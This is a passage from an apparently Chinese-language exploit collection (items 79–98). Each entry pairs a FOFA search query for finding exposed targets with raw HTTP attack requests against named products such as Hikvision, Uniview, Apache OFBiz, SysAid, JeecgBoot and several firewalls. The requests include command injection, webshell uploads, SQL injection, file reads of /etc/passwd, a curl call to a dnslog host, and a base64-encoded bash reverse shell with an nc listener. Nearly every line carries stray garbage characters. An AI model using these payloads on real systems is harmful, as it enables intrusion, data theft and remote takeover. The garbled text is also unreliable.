5 l* }3 z7 N" A% V: ^Host: x.x.x.x) W7 }( e+ Q. Y5 F
5 G/ k2 l- ^( C. f r: ?3 L$ L% G
! H& k3 F j' i& h2 E# u5 W79. BYTEVALUE 百为流控路由器远程命令执行8 X x* [ L1 I! e" h( f* y
FOFA:BYTEVALUE 智能流控路由器9 j+ p8 r# e s% r% V
GET /goform/webRead/open/?path=|id HTTP/1.1
) M1 C, f; S9 t( C. J' v( pHost:IP6 m: d8 A7 T. u- b( p v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
" m! @% p! T5 U8 `' CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" Z3 Z D: P) |! q$ f3 V! [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- U+ P4 \1 L: o( G% i' |, ?% }Accept-Encoding: gzip, deflate W, P# V- S2 {. ~. `9 G6 O$ z
Connection: close& H0 I+ g! h5 ?+ p" S& E) l
Upgrade-Insecure-Requests: 1) D! o& e& w3 a* W4 w) n
1 U |3 A! I$ u6 {
( ^$ c, h. P5 r4 Z0 a4 U80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
- ]5 ^* Q) ?& UFOFA:app="速达软件-公司产品"
9 ~$ U* P; [* `+ {! _" m) }POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
4 J7 F0 Z7 V. y: h1 |Host: x.x.x.x: s* o& |7 }/ n7 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 l8 }6 ]: }- w8 X8 v g. p2 b1 V$ Q
Content-Length: 27; k3 R2 a. ~2 I! @6 l: ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! j) _% P' K7 a3 l; a( k* B& Y: W
Accept-Encoding: gzip, deflate% M$ Y! S* O( e, ]6 X8 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 f- x4 N- \2 D" t* x) B& R/ JConnection: close- U7 f; f, y- V$ R+ ?/ R' ?) V3 `
Content-Type: application/octet-stream( b- i: }) S% g Z1 b; W, G( S
Upgrade-Insecure-Requests: 1
* i# M4 Z6 ?" K- T2 t" X5 i2 W U" _) I* D- x
<% out.print("oessqeonylzaf");%>4 l4 O1 t: z. [+ W% b" z: M, {
: K6 O6 I% q d5 ~4 a8 G2 x( m( M! n8 ]5 M! ~0 C# F n1 c
GET /xykqmfxpoas.jsp HTTP/1.1
" ~' X6 z$ e" s0 o3 X NHost: x.x.x.x5 \0 Y8 B& E9 F+ l7 F/ T* Y) `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 j) }" g" V, ^2 u7 f* c% NConnection: close
" ^: [: `/ o& f9 ~$ v- O; s8 A5 dAccept-Encoding: gzip2 a5 @, j3 b* f- w; V
: _2 d3 I; k; R! s! |+ a; j
5 Z& j$ f! K8 \5 a) g p
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露' W8 E, s6 C. O) E; _1 D4 ~6 f, b
FOFA:app="uniview-视频监控"* F2 R+ k* d4 I+ d/ @- q% k& k
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1$ I& s. g1 J# _5 n Q K7 f
Host: x.x.x.x
/ u3 q2 }- ]5 z+ l- t7 ^# EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; }3 i. u8 c6 D, N* s
Connection: close
/ C& I8 J+ r* b* d" P; CAccept-Encoding: gzip; v* t' d( w2 ]) u" Z
! w- Q- o3 R4 f5 k( [$ F+ _4 a" u0 k; x3 Z, X! {3 q5 I' c: L
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
0 w: B6 I& W: {0 }) WFOFA:app="思福迪-LOGBASE"$ ] i) z9 O3 U2 Q9 C F5 t4 u
POST /bhost/test_qrcode_b HTTP/1.1
" E( M) {4 u0 w. _5 P% N8 v1 ZHost: BaseURL
1 {0 r, K7 ? c8 g( YUser-Agent: Go-http-client/1.1
& w0 Y# k; k4 c- W. oContent-Length: 23
8 V6 b/ a& d/ c; ]2 LAccept-Encoding: gzip# Z4 ]$ }6 D" j8 x% \, X Y7 a% E
Connection: close3 s# A- S2 T. q0 h
Content-Type: application/x-www-form-urlencoded, V4 L1 n! u& c5 T2 }! x9 x, l
Referer: BaseURL/ j, k* n9 {1 V9 G' _" V0 C
* q' |" p6 c) p+ r. Nz1=1&z2="|id;"&z3=bhost& s# E% x! S; U0 Z8 O; g4 F
3 z( P0 C2 M! g+ l% G
, ~ [* |! a0 P83. JeecgBoot testConnection 远程命令执行
' n: q0 w+ k3 X2 [7 J1 d( K2 u. IFOFA:title=="JeecgBoot 企业级低代码平台", H) l1 G- ^# F7 ?
7 _( ^4 `9 o/ g6 x
, {+ }! ?4 v0 g4 }8 u, W( m
POST /jmreport/testConnection HTTP/1.1
& {2 b n) O) J6 {: [2 tHost: x.x.x.x% f8 b# r( M- F8 m Y( P2 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 ?* n) G; T0 ^- R6 gConnection: close
- ?& [- @1 d9 ^7 @- r9 w" [' iContent-Length: 8881
; X0 z4 y1 N- GAccept-Encoding: gzip9 ~1 x& o' }* c$ B; r' w/ u2 b% G D
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO": H2 J* W0 `) O& a
Content-Type: application/json v# x# k* N* {2 y' |
5 ]& H7 n2 P, ?7 P3 rPAYLOAD
0 L" @* z' x6 Y9 `4 f7 |7 b$ P; O6 _
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
' e# b1 n1 h" x4 E( sFOFA:title=="JeecgBoot 企业级低代码平台"0 o. F3 h1 Q: G1 d; a0 y
* P2 `- u4 l b* A4 ^# l6 A( g% I9 ^6 A' i% @/ ]; ~5 A
0 d7 A4 n @* m5 D4 I
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.17 S# {8 p8 E2 `3 Z' ~ d
Host: 192.168.40.130:8080! r( x# ~: T& ?) |8 @2 y8 g
User-Agent: curl/7.88.14 o, K6 v5 q1 z4 Y; L1 q, g; K
Content-Length: 156
3 g$ k( V9 g) R. `Accept: */*
, b7 _& Z7 {; g$ _1 Z. MConnection: close
2 u; D4 N' t" U0 B( \8 t# |Content-Type: application/json3 M3 q' ~8 Y: X! H2 h9 v
Accept-Encoding: gzip2 S2 j: ]. u* a1 t
" | ]2 s, M5 N{
" y$ B& ]4 b. X8 m2 o "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",4 A6 u+ M4 A; c! u( P- n, l
"type": "0": [0 Y& z/ c- }, M) t' ]; v6 c) i
}
4 y D2 @7 w& y6 Q w, S
0 B% J1 S6 T3 D8 M! F3 y( b' u$ e; f' `& {+ T
85. SysAid On-premise< 23.3.36远程代码执行
! G, L0 q+ a! x' ECVE-2023-47246
4 c6 g3 q" |" ~7 ?& a$ Q0 DFOFA:body="sysaid-logo-dark-green.png"
4 A. O2 G) C ?: U& ~% DEXP数据包如下,注入哥斯拉马% s+ Y2 z. k9 [4 o
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
1 g9 b6 o! c$ I; F% K6 \1 _0 mHost: x.x.x.x
( k F8 M" [. `! F: ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 @! I/ L6 b+ L! s) n
Content-Type: application/octet-stream# P% I5 ~ i, L3 Y
Accept-Encoding: gzip: P, s P Q/ t0 j, {
/ {# O+ z9 z" q e
PAYLOAD& C) Y- f6 |0 I$ k, \% b8 U; n
' V5 Y) T5 l6 ~0 E0 r& Y/ t: c0 @
回显URL:http://x.x.x.x/userfiles/index.jsp
7 t* c) P, D. y3 N8 r# `/ x t
! H2 [# M0 Y! u1 P* C5 o8 ]86. 日本tosei自助洗衣机RCE4 B. h! c4 ^, z' J/ @5 [9 W
FOFA:body="tosei_login_check.php"
& F7 v% t) j& a/ Q$ t' FPOST /cgi-bin/network_test.php HTTP/1.1# ^# ~/ |+ g* F6 m& j) i
Host: x.x.x.x4 t/ s, j6 C- }$ k& r4 T/ P
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
+ H3 o' P+ U+ mConnection: close
: M# [$ B' a; |% v gContent-Length: 44
2 O! B+ A1 y2 H! WAccept: */*! k0 G6 n6 s, Q* O) r% M. i9 @, F
Accept-Encoding: gzip; t2 W( Q1 e) l* m, T
Accept-Language: en1 W: ?5 Y) z% f6 C' ?$ z+ ~: u
Content-Type: application/x-www-form-urlencoded1 F% g+ k% Y- {7 O; X4 E1 e
! b. E6 R! f% ?4 E Q% M2 f
host=%0acat${IFS}/etc/passwd%0a&command=ping' a. `1 z2 u6 R0 ~$ \* U/ u8 v
- h! u$ \4 ~0 [- L. T' ]: Q; f
4 ]0 H+ \+ b& @2 y% X9 z87. 安恒明御安全网关aaa_local_web_preview文件上传! n; d9 b* M+ ^$ Q( M3 t ^( O
FOFA:title="明御安全网关"
9 R! E' A9 \' g9 [ VPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
% f- I" D# w, w) mHost: X.X.X.X
9 o+ @" w4 h3 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 j2 s. x& |8 `% b6 g5 S. z3 Y- iConnection: close
7 y- g' E5 j: m* N, XContent-Length: 198
7 r2 ?& s0 j* {2 ?5 hAccept-Encoding: gzip
1 \' \5 e8 s" y' P: L' kContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
: `4 S2 C: n7 B. O0 p% A# [+ J3 g2 D( a/ a: c
--qqobiandqgawlxodfiisporjwravxtvd/ D# p% ?8 F/ v& w Q" v
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
& Z2 `( T* N @6 b! R$ yContent-Type: text/plain
) s' ~( ^) J& A) h5 I6 O
/ B4 E7 k5 D8 U7 L; D3 Q' z, Q7 ?9 f2ZqGNnsjzzU2GBBPyd8AIA7QlDq1 w8 N$ |# t# s8 F1 y& r+ |4 ^
--qqobiandqgawlxodfiisporjwravxtvd--
. R0 V! R3 v/ H+ X7 @! f
+ I$ g* ?( j: M' c7 O t; E, j: s& V; y1 l( U6 x9 _
/jfhatuwe.php
8 |- l( H4 m# f2 ^1 T4 d0 l+ Y
. J3 U) f6 J/ |) p88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行0 F8 H( k6 O" E3 l& `
FOFA:title="明御安全网关"8 }% a% k5 T2 h; G1 F# D! e
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1$ c9 i! C6 ]" [: E$ f, _
Host: x.x.x.xx.x.x.x1 o. w! Q4 G+ z0 j4 a. Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 ] L; Q7 G* C! N- ?) ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; I1 ~ v2 m9 S! {4 [; X l
Accept-Encoding: gzip, deflate h% ~) a: x: N
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% a+ [4 r* Z- x1 z- j8 fConnection: close; d# X* d2 U1 ~3 F0 N7 E
5 [; K$ o+ @9 h
8 s+ w4 r( l8 s6 \
/astdfkhl.php% D$ F ~4 t! N$ s* B1 Q3 W
/ Y4 P) z4 j2 m" C/ u5 x89. 致远互联FE协作办公平台editflow_manager存在sql注入0 I" |# s* z u7 f
FOFA:title="FE协作办公平台" || body="li_plugins_download"
2 z: l6 G1 ~% e' ^* G9 m/ VPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
6 z, \* o8 [1 V1 |* P* cHost: x.x.x.x4 J) f, p+ ]0 c! o; _' ~% e. y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! ]0 F' Z+ E) ]- @ SConnection: close
5 d# S$ \$ _* c3 C( rContent-Length: 41
( a+ k2 o" n+ [/ h2 Y3 D3 BContent-Type: application/x-www-form-urlencoded
+ ]3 {$ m; `) W8 f( VAccept-Encoding: gzip
9 M3 Y/ m4 b) ^: P
+ k+ D* ]2 N2 S9 ?/ V* W- t1 E, \0 Xoption=2&GUID=-1'+union+select+111*222--+
. `( n, N% O: q6 z* E X) R* s& B! T0 R6 ~
+ w) Q% w& T$ c/ C& z90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行! T' }* R5 Z7 e' M3 {/ v0 B
FOFA:icon_hash="-1830859634"
- p* p! n# Z8 u8 W# N0 iPOST /php/ping.php HTTP/1.1
; ?2 i; g6 A: A: q) EHost: x.x.x.x* I3 @% B# K7 R) B+ V. }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
* d* W' p0 Y" n; L, o, d$ HContent-Length: 51
8 L! M; \; x5 pAccept: application/json, text/javascript, */*; q=0.01! F5 `5 K7 h( v: {: W) g& d6 t
Accept-Encoding: gzip, deflate
9 M x& |0 G8 H- QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% ~2 \4 k2 C/ h1 P' P
Connection: close
5 c& a; U) T9 r6 l0 F" XContent-Type: application/x-www-form-urlencoded8 a9 z7 @' w) ]6 s/ e* p8 u
X-Requested-With: XMLHttpRequest
( N3 C3 }" J' T/ }3 F2 G
, c4 ]( d* V+ cjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig& Q' z+ q# V) [1 v5 f
1 l0 a* Q0 D- t( L
+ T. ~9 {, u' k2 L& x- |7 @& [0 `91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取1 G0 L! w. h U3 K. x9 {
FOFA:title="综合安防管理平台"
! _ H- t2 P" T6 I( _GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
( U5 B+ ~% }- t; qHost: your-ip9 l: d% }. c2 ^6 t% F0 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
* r2 d A- V0 PAccept-Encoding: gzip, deflate v0 f( c7 W4 i8 o* w2 Q/ ]
Accept: */*
9 X2 k% m# v; K' j- V3 bConnection: keep-alive2 }- ]7 L% f0 s* z) j% e7 P( `7 C
! y$ s4 v1 Q. H# [7 v2 O* S( i, q, c
% W+ L+ F( Q6 u% S% |92. 海康威视运行管理中心session命令执行4 [# c1 i: r2 r
Fastjson命令执行
; {, b3 [! O# h2 Thunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"0 s4 E7 Z2 i0 Z! s7 \! _
POST /center/api/session HTTP/1.15 O3 h5 k& u* W ~/ ]
Host:7 F d5 L" ?9 d
Accept: application/json, text/plain, */*
( N7 s! b c; ]% xAccept-Encoding: gzip, deflate, X; C0 ?- Q0 \. A5 R3 i
X-Requested-With: XMLHttpRequest
( E0 y6 t1 b* M# A" L. s$ h5 V; U$ oContent-Type: application/json;charset=UTF-89 H0 y' i. G* s9 }0 N' Y
X-Language-Type: zh_CN
0 x o1 ~* I+ z' L& E' R; u& M+ wTestcmd: echo test
: O4 @* _) E+ }& F) _& B0 D8 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
" Z' d7 g2 _! |Accept-Language: zh-CN,zh;q=0.9
: z* y2 c4 m/ p& x, `* C- KContent-Length: 5778
# K( T0 s0 _4 B- }/ G& [, B/ k3 t2 E* A6 c0 ?7 g) l( w
PAYLOAD
8 N$ O5 s3 y+ o( b z( e
- Q/ u+ d# s4 R1 u
* s3 p0 u( E( d/ L9 K93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
5 }, p' V. X4 wFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
_1 E! `0 v0 a& TPOST /?g=app_av_import_save HTTP/1.1! ]+ ~. R& M# D0 w" V, f' |
Host: x.x.x.x
4 r) b* r4 F. ~3 qContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
% l: H1 ~# G9 GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- {4 t7 | v7 v5 B5 W1 W/ R6 T6 C
------WebKitFormBoundarykcbkgdfx
' f3 N! U; ]5 b/ N; D/ Q& |Content-Disposition: form-data; name="MAX_FILE_SIZE". J7 W6 |4 e! `6 p8 m$ g4 v9 a
; b; \) M2 f. L5 a6 ]: \
10000000
& E9 g4 o0 P: ~0 @2 N' ^------WebKitFormBoundarykcbkgdfx/ ^' w8 \! P0 U, [, c5 k
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
/ S. |5 {. y1 D$ G1 aContent-Type: text/plain/ `/ B, O0 J3 D! b+ n
* h8 z; f; \3 O$ V3 \
wagletqrkwrddkthtulxsqrphulnknxa) g( X# @) o" Q. h
------WebKitFormBoundarykcbkgdfx# n2 W" p; t0 {8 q! R$ D
Content-Disposition: form-data; name="submit_post"7 w* R8 L3 `( n) {: \- }/ T3 u; `
& z# L$ \4 I, n! r0 d/ i
obj_app_upfile
/ |) |/ N7 i2 {% F0 r$ w------WebKitFormBoundarykcbkgdfx
0 Y- v: |1 b0 l2 RContent-Disposition: form-data; name="__hash__"$ ]1 f }. {6 G1 S+ G
$ k |0 D- b! q9 i( }0b9d6b1ab7479ab69d9f71b05e0e9445$ N& G+ g3 U) s, c/ K. f- G5 Q
------WebKitFormBoundarykcbkgdfx--
4 K# W/ h. J, O- U
! F) k" A1 s {4 T! p
, r( d$ [, `# X7 h9 p: Q3 e XGET /attachements/xlskxknxa.txt HTTP/1.1) z8 d! M0 u4 r5 Y4 R% z! K' O
Host: xx.xx.xx.xx8 K: [5 D: B. h( Y1 {9 G% C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 a1 s" ?7 v# A
! W) \' D I7 h& c
D: C; n. X" _ t# N* H a94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传; a$ U5 r6 P- U. s) P# s) O
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="+ [/ f1 N' l2 | z8 S* f
POST /?g=obj_area_import_save HTTP/1.1; c, A# F% W5 @
Host: x.x.x.x
/ b& N- f' b+ G u$ ZContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
9 A0 i* W$ W& n' DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
7 }- C8 ?6 F# F5 c
% ^5 j' A- M$ \5 f------WebKitFormBoundarybqvzqvmt9 l8 x" K$ o9 l! d0 i
Content-Disposition: form-data; name="MAX_FILE_SIZE"
, m2 V! d4 @0 p' V" }$ M% h) R* e2 t( ~- B+ l- a% n
10000000
) q! _& s9 R, X* S* Z9 \# B2 \------WebKitFormBoundarybqvzqvmt& b7 x" J9 X* w b8 K I$ b5 b
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
d( Q3 S3 z3 d/ @! [- dContent-Type: text/plain
# o9 n2 o/ Q- L; V8 m, g0 X) i
7 B+ [& Z% B) N* vpxplitttsrjnyoafavcajwkvhxindhmu% |1 b% g4 A& F% E: L
------WebKitFormBoundarybqvzqvmt% [5 Q3 E" y& ]! }; g9 k
Content-Disposition: form-data; name="submit_post"
. C" o w! G6 B. z5 ^, J1 a8 R
# }9 `+ @2 ]. Wobj_app_upfile/ ^! y2 J6 t) Y) I6 t
------WebKitFormBoundarybqvzqvmt4 J6 d; t3 `, b* S7 l) R
Content-Disposition: form-data; name="__hash__"
5 f# ]# l3 K7 F; w8 X* k. Y# q+ S, p. j. L0 [
0b9d6b1ab7479ab69d9f71b05e0e94457 g' \( ^4 j8 U* q7 R
------WebKitFormBoundarybqvzqvmt--
+ P: A% \! Y5 m" O3 |
' `; u+ M b. m$ q8 S% A- i3 q2 X# N. P5 B7 U
6 y8 l# _* n7 `, x n
GET /attachements/xlskxknxa.txt HTTP/1.1
' X6 Z) m8 H& p# QHost: xx.xx.xx.xx
5 N5 s' x0 x: Q- z2 j( x, pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
( H: h9 j5 v4 d! B& k
, o1 j0 l) i) p3 z8 j% L4 F9 }3 t) s$ g% A0 o& ~3 U
! Z% ?+ _/ E* K5 O! h! I
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
$ X" P8 z% ^. o+ y {/ d3 k" t5 xCVE-2023-490707 n. r G) R# @% I' W3 O! `
FOFA:app="Apache_OFBiz"
) k5 z% w9 U9 {5 l: zPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
3 O: G2 y8 a9 u9 l5 z8 H& ^9 RHost: x.x.x.x
, l7 j+ p5 Y/ |$ e& `1 d# m5 LUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 Z: g; R# V, H, p9 m# ZConnection: close
' u5 z$ |5 \2 w# t' ]Content-Length: 889
8 _' u: f" _3 K4 w5 T3 Y# CContent-Type: application/xml; Q3 Q8 K: z& N! O6 B/ r9 D
Accept-Encoding: gzip/ O# P! y9 U5 [3 e+ a# u
5 _8 @* U( b3 ?7 c% f$ C- z<?xml version="1.0"?>
$ \' K' v/ K! z<methodCall>* L- ]! P. D5 u
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
: O) ^) ]/ }. E' d" f7 R <params>
6 A, n- H4 Y, o: m' z <param>3 v' i: s, h4 ~3 R8 }/ K' M! x
<value>: H, p, z( T" t3 D# B
<struct>0 z" m* z; Z: |9 T
<member>% w o1 \( g# v) p
<name>test</name>1 j$ j- T5 w5 M% y0 Q2 g
<value>/ R2 Z2 \6 ^) x) H \- S
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>2 x N# ]5 H) ?: e, }
</value>
/ q8 Y9 o8 Y# I- ]8 I; U# y </member>
5 A- M6 ^" e% [+ r. N: E: R1 z1 y" s </struct>/ t$ {0 Q$ c8 x n! Q5 [& [1 I, e
</value>4 J& F% b1 W i* p' n
</param>2 ~& A- `. E& l# M
</params>
# `3 W2 p `+ r* T% d</methodCall>- O ^! u/ d5 O/ O9 \2 a& b
4 W- ~/ |3 K) _! J
% H" c9 P( Q& O, n; b5 j' u7 A
用ysoserial生成payload _ q1 J5 m% i9 X/ W. o
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"- B3 p$ A6 `3 w5 z3 H7 Z9 @
: `% r" R2 N0 `9 M
0 S& a, E- Z9 W! ~9 J将生成的payload替换到上面的POC
' K7 c3 m: i' j* P7 G1 Q& S" ?POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
! F9 {# A* T$ ?3 }+ Q5 J( V- FHost: 192.168.40.130:8443/ u1 Z/ ~' G S+ U0 \0 `) j$ [
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" q( B- F3 z! p3 J U1 p7 x
Connection: close* g2 ?7 {$ q' w
Content-Length: 889 z3 F6 u$ S5 }" z' l
Content-Type: application/xml; Z- M' n* x* n
Accept-Encoding: gzip
; C6 y7 b8 O; s7 _' o1 h* Q$ i6 o- F( q4 U, q$ B2 ~4 G/ S& }
PAYLOAD! e5 a: ~9 S; m+ |; c
/ H3 s: P$ t$ a# s4 g
96. Apache OFBiz 18.12.11 groovy 远程代码执行3 E, C1 M5 j2 a' m9 j* m3 n- `& U
FOFA:app="Apache_OFBiz"" p7 @* l0 l) F
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
+ F J& T7 J7 n7 l; aHost: localhost:84439 M$ M4 S1 n' @$ P F+ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.02 f( x$ i" S4 V# R7 h. O
Accept: */*/ T7 j; y5 l$ t! M
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 y! q/ H1 S5 K/ Q% UContent-Type: application/x-www-form-urlencoded& H9 w5 D: d& m: E. \& Q' @, J
Content-Length: 552 B- q$ T( K) x0 Y2 ^3 g& K
0 w) N* ^1 ~5 j( v& o0 z
groovyProgram=throw+new+Exception('id'.execute().text);
3 w9 R* |& Z3 R( ]) ]' f5 \
]! u1 g6 R! m" l$ L; i) K7 X5 c- C6 q
反弹shell
' v/ u. I& O# Z! \5 f0 d: y3 [在kali上启动一个监听, _8 h8 ?; i ?8 j8 ~
nc -lvp 7777
4 G# B3 w0 g& z4 S& H7 }) n( G& B5 r) J- p" b, k$ _- G9 y1 b
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
2 [0 H4 _; u8 p, W" _Host: 192.168.40.130:84437 H- N, V. |% R9 n8 s9 b0 A5 q6 v
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ {& [& u- }5 B2 RAccept: */*
+ F) B0 b% {1 U9 i( O2 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! r* i d4 x! g4 YContent-Type: application/x-www-form-urlencoded" l) F" N, V; ]1 z; X5 x# L y
Content-Length: 71+ B4 H- t- H0 D. K: a
7 p8 v& W! S2 b
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();) Z( H6 Z# f( L- U' C4 W
+ Y% R' C- B. N, m- p
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
0 J) L" v5 Z4 z5 M9 Q# SFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"& g+ G& |$ u b
GET /passport/login/ HTTP/1.1
1 }# L$ t2 c; z# z! THost: 192.168.40.130:8085- D1 @, L+ v) \3 d1 k% i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, Q& V4 H; S8 E+ D4 u2 s
Accept-Encoding: gzip
5 ^# f, `! O6 T! uConnection: close
* h, D; G( G) C8 U" tCookie: rememberMe=PAYLOAD
" H* g5 {4 A$ [" K, P7 U3 QX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"7 u. R, i4 m7 G0 k4 ^) p
3 y3 b# x% v% A" f0 q6 D- s1 C" h
1 g/ b; {, J! o3 w7 ~
98. SpiderFlow爬虫平台远程命令执行
2 i& [; s+ I+ R- l! m5 TCVE-2024-0195
: o8 I: n4 E. l! f m* C6 cFOFA:app="SpiderFlow"
j, L( A- R: e8 [3 g- D6 X+ dPOST /function/save HTTP/1.1* d7 b. L& w' M
Host: 192.168.40.130:8088: P s7 g+ i, B+ v" P( Y$ q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- e/ y% A6 u! f6 a& W* s& Z* k
Connection: close% t+ L, \. |6 Z# D
Content-Length: 1211 l% i# T7 p5 G. `% }
Accept: */*
% n. u; u5 t! |* o/ I/ l/ [. X8 f/ l% EAccept-Encoding: gzip, deflate7 u3 ?& h# v% P, x! C
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
